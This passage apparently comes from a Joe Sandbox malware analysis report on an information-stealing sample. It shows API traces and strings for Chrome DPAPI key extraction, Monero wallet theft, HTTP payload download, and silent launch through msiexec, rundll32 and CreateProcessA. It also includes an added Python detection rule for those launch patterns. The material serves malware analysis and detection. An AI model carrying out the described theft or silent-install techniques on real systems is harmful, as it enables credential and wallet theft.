                                  • Opcode Fuzzy Hash: c966b1d2bff0186d16334794f0ecdb2948fd0a8507f778a3f9c1e08f5450a090
                                  • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                  APIs
                                  • strtok_s.MSVCRT ref: 00411307
                                  • strtok_s.MSVCRT ref: 00411750
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00883680,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strtok_s$lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 348468850-0
                                  • Opcode ID: c36c6220a1731f690f2bad5fcd02e57531a13a3029cc92974acfb62a5780bfb7
                                  • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                  • Opcode Fuzzy Hash: c36c6220a1731f690f2bad5fcd02e57531a13a3029cc92974acfb62a5780bfb7
                                  • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 154c5dc731ad3e96d902aef29615356604d56b336ceddfc02004fe10789c21fa
                                  • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                  • Opcode Fuzzy Hash: 154c5dc731ad3e96d902aef29615356604d56b336ceddfc02004fe10789c21fa
                                  • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
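The string table of the ShellExecuteEx function above (`.dll`, `.msi`, `/i "`, `/passive`, `C:\Windows\system32\msiexec.exe`, `C:\Windows\system32\rundll32.exe`) together with the CreateProcessA/`.exe` function before it describes a payload dispatcher that picks a host process by file extension. The following is an added detection example written for this report, not code from the sample or from Joe Sandbox: it classifies process-creation events by those three dispatch patterns. The events are constructed, and the idea that a dropped payload sits in a user-writable directory (AppData, Downloads, Temp, ProgramData, Public) is an assumption of the rule, not something the trace states.

```python
"""Flag the three payload-dispatch shapes seen in the API trace:
msiexec.exe /i "<pkg>.msi" /passive, rundll32.exe <path>.dll,<export>,
and a dropped .exe started by CreateProcessA."""
import re
from typing import Optional

# Host processes named in the sample's string table (compared case-insensitively).
MSIEXEC = r"c:\windows\system32\msiexec.exe"
RUNDLL32 = r"c:\windows\system32\rundll32.exe"

# Assumption, not from the report: a payload staged by a stealer/loader lands
# in a user-writable directory. Tune this to the environment.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads)\\|\\temp\\|\\programdata\\|\\public\\", re.I)

# Constructed process-creation events for demonstration; not sandbox output.
SAMPLE_EVENTS = [
    {"pid": 1, "image": MSIEXEC, "parent": r"C:\Users\bob\Downloads\YLshJwBcrT.exe",
     "cmdline": r'C:\Windows\system32\msiexec.exe /i "C:\Users\bob\AppData\Local\Temp\pkg.msi" /passive'},
    {"pid": 2, "image": RUNDLL32, "parent": r"C:\Users\bob\Downloads\YLshJwBcrT.exe",
     "cmdline": r"C:\Windows\system32\rundll32.exe C:\Users\bob\AppData\Roaming\x.dll,Entry"},
    {"pid": 3, "image": r"C:\Users\bob\AppData\Local\Temp\upd.exe",
     "parent": r"C:\Users\bob\Downloads\YLshJwBcrT.exe",
     "cmdline": r"C:\Users\bob\AppData\Local\Temp\upd.exe"},
    # Benign-looking install: no /passive, package in Downloads, parent is explorer.
    {"pid": 4, "image": MSIEXEC, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'C:\Windows\system32\msiexec.exe /i "C:\Users\bob\Downloads\7zip.msi"'},
]


def _path_with_ext(cmdline: str, ext: str) -> Optional[str]:
    """Return the first quoted or unquoted drive path ending in .ext, or None."""
    pat = r'"([A-Za-z]:\\[^"]*\.%s)"|([A-Za-z]:\\[^\s"]*\.%s)(?=[,\s]|$)' % (ext, ext)
    m = re.search(pat, cmdline, re.I)
    return (m.group(1) or m.group(2)) if m else None


def classify_event(ev: dict) -> Optional[str]:
    """Map one process-creation event to a detection tag, or None if benign."""
    cmd = ev["cmdline"]
    image = ev["image"].lower()
    if image == MSIEXEC:
        # The sample builds: msiexec.exe /i "<pkg>" /passive
        pkg = _path_with_ext(cmd, "msi")
        if (pkg and re.search(r"(^|\s)/i(\s|$)", cmd)
                and "/passive" in cmd.lower() and USER_WRITABLE.search(pkg)):
            return "msiexec-passive-install-from-user-dir"
    elif image == RUNDLL32:
        # The sample builds: rundll32.exe <dropped>.dll[,export]
        dll = _path_with_ext(cmd, "dll")
        if dll and USER_WRITABLE.search(dll):
            return "rundll32-dll-from-user-dir"
    elif (image.endswith(".exe") and USER_WRITABLE.search(image)
          and USER_WRITABLE.search(ev["parent"])):
        # CreateProcessA on a dropped .exe, launched from a user-dir parent.
        return "exe-from-user-dir-spawned-by-user-dir-parent"
    return None


def scan(events) -> list:
    """Return [(pid, tag)] for every event that matches a dispatch pattern."""
    return [(ev["pid"], tag) for ev in events if (tag := classify_event(ev))]


if __name__ == "__main__":
    for pid, tag in scan(SAMPLE_EVENTS):
        print(pid, tag)
```

The `/passive` switch is what separates the sample's silent install from an ordinary user-driven `msiexec /i`; event 4 is left alone for exactly that reason, so the rule should be paired with parent-process context rather than loosened.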
                                  APIs
                                  • memset.MSVCRT ref: 022F4505
                                  • memset.MSVCRT ref: 022F451C
                                    • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F4553
                                  • lstrcat.KERNEL32(?,0064A30C), ref: 022F4572
                                  • lstrcat.KERNEL32(?,?), ref: 022F4586
                                  • lstrcat.KERNEL32(?,0064A5D8), ref: 022F459A
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022F8FF7: GetFileAttributesA.KERNEL32(00000000,?,022E1DBB,?,?,0042565C,?,?,00420E1F), ref: 022F9006
                                    • Part of subcall function 022E9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 022E9FA0
                                    • Part of subcall function 022E9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 022E9FF9
                                    • Part of subcall function 022E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                    • Part of subcall function 022E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                    • Part of subcall function 022E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                    • Part of subcall function 022E9C27: ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                    • Part of subcall function 022E9C27: LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                    • Part of subcall function 022E9C27: CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                    • Part of subcall function 022F9627: GlobalAlloc.KERNEL32(00000000,022F4644,022F4644), ref: 022F963A
                                  • StrStrA.SHLWAPI(?,0064A0D8), ref: 022F465A
                                  • GlobalFree.KERNEL32(?), ref: 022F4779
                                    • Part of subcall function 022E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D56
                                    • Part of subcall function 022E9D27: LocalAlloc.KERNEL32(00000040,?,?,?,022E5155,00000000,?), ref: 022E9D68
                                    • Part of subcall function 022E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022E5155,00000000,00000000), ref: 022E9D91
                                    • Part of subcall function 022E9D27: LocalFree.KERNEL32(?,?,?,?,022E5155,00000000,?), ref: 022E9DA6
                                    • Part of subcall function 022EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F470A
                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 022F4727
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 022F4739
                                  • lstrcat.KERNEL32(00000000,?), ref: 022F474C
                                  • lstrcat.KERNEL32(00000000,00420FB8), ref: 022F475B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 1191620704-0
                                  • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                  • Instruction ID: 9909a654cbe1a59b1fc7ced73218e20d6a4779f1f8c9c5d7f42c70c81a1954ef
                                  • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                  • Instruction Fuzzy Hash: E17174B6910218BBDB14FBE0DC45FEEB37AAF49300F4085A8E60996184EB75DB48CF51
                                  APIs
                                  • memset.MSVCRT ref: 0041429E
                                  • memset.MSVCRT ref: 004142B5
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                  • lstrcatA.KERNEL32(?,0088A6C0), ref: 0041430B
                                  • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                  • lstrcatA.KERNEL32(?,0088ABD0), ref: 00414333
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                    • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                    • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                  • StrStrA.SHLWAPI(?,0088BDC0), ref: 004143F3
                                  • GlobalFree.KERNEL32(?), ref: 00414512
                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                  • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                  • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                  • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 1191620704-0
                                  • Opcode ID: da017c058fb2f294138a0ea1b89b15030ef27b9e8023dbd69d578e4640a9d96b
                                  • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                  • Opcode Fuzzy Hash: da017c058fb2f294138a0ea1b89b15030ef27b9e8023dbd69d578e4640a9d96b
                                  • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                  APIs
                                  • memset.MSVCRT ref: 00401327
                                    • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                    • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                    • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                    • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                    • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                  • lstrlenA.KERNEL32(?), ref: 0040135C
                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                  • memset.MSVCRT ref: 00401516
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 1930502592-218353709
                                  • Opcode ID: 8f1af44f0471db40cbeeb3acc638c17ebe6dcb10dd0f8b1439207695b066911b
                                  • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                  • Opcode Fuzzy Hash: 8f1af44f0471db40cbeeb3acc638c17ebe6dcb10dd0f8b1439207695b066911b
                                  • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0088C4D8), ref: 00406303
                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0088BFB8,00000000,00000000,00400100,00000000), ref: 00406385
                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                  • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                  • lstrlenA.KERNEL32(00000000), ref: 00415383
                                  • strtok.MSVCRT(00000000,?), ref: 0041539E
                                  • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3532888709-1526165396
                                  • Opcode ID: c3080ecd0a6d2aaa5a38b2191e54b3eb9af717d792ebc913c1fc0f2162e4d86d
                                  • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                  • Opcode Fuzzy Hash: c3080ecd0a6d2aaa5a38b2191e54b3eb9af717d792ebc913c1fc0f2162e4d86d
                                  • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                  • StrCmpCA.SHLWAPI(?,0088C4D8), ref: 00406147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                  • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                  • InternetCloseHandle.WININET(a+A), ref: 00406253
                                  • InternetCloseHandle.WININET(00000000), ref: 00406260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Similarity
                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID: a+A$a+A
                                  • API String ID: 4287319946-2847607090
                                  • Opcode ID: c7bc458361b14762599541627539190d7fbcbcfe1bc678f5eaebc030e8ecc5e4
                                  • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                  • Opcode Fuzzy Hash: c7bc458361b14762599541627539190d7fbcbcfe1bc678f5eaebc030e8ecc5e4
                                  • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • memset.MSVCRT ref: 022F0E83
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F0E9C
                                  • lstrcat.KERNEL32(?,00420D7C), ref: 022F0EAE
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F0EC4
                                  • lstrcat.KERNEL32(?,00420D80), ref: 022F0ED6
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F0EEF
                                  • lstrcat.KERNEL32(?,00420D84), ref: 022F0F01
                                  • lstrlen.KERNEL32(?), ref: 022F0F0E
                                  • memset.MSVCRT ref: 022F0F34
                                  • memset.MSVCRT ref: 022F0F48
                                    • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                    • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022F9948
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022F0FC1
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022F0FCD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                  • String ID:
                                  • API String ID: 1395395982-0
                                  • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                  • Instruction ID: da5286b6c1f4342075c09c9871d0a00fb238edcb978981ae55dbee23abb1ddda
                                  • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                  • Instruction Fuzzy Hash: E081C4B5960318ABCB54EBE0CD51FEDB33AAF54304F0041B8A30A66185EF746B88CF59
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • memset.MSVCRT ref: 022F0E83
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F0E9C
                                  • lstrcat.KERNEL32(?,00420D7C), ref: 022F0EAE
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F0EC4
                                  • lstrcat.KERNEL32(?,00420D80), ref: 022F0ED6
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F0EEF
                                  • lstrcat.KERNEL32(?,00420D84), ref: 022F0F01
                                  • lstrlen.KERNEL32(?), ref: 022F0F0E
                                  • memset.MSVCRT ref: 022F0F34
                                  • memset.MSVCRT ref: 022F0F48
                                    • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                    • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
